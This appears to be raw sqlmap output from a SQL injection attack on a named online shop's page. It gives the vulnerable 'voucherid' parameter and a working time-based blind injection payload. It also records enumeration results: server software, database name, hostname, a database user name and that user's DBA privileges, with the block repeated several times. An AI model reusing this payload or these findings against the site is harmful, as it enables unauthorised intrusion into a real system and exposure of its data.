-------------------------
Vulnerable URL: https://loja.eset.pt/index.php
Vulnerable parameter: voucherid
Identified following injection points:
---
Parameter: voucherid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
banner: '9/9/9X'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voucherid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
banner: '9/9/9X'
current user: 'mcatarino@%'
current database: 'eset_vouchers'
hostname: 'extra'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voucherid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voucherid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voucherid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
current user: 'mcatarino@%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voucherid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
current user: 'mcatarino@%'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voucherid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: voucherid=BLACKFRIDAY' AND SLEEP(5)-- QqCn
---
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
current user: 'mcatarino@%'